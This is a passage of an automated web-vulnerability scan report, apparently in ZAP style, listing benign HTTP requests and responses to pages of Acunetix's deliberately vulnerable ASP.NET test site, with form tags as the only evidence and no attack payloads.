Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="about.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
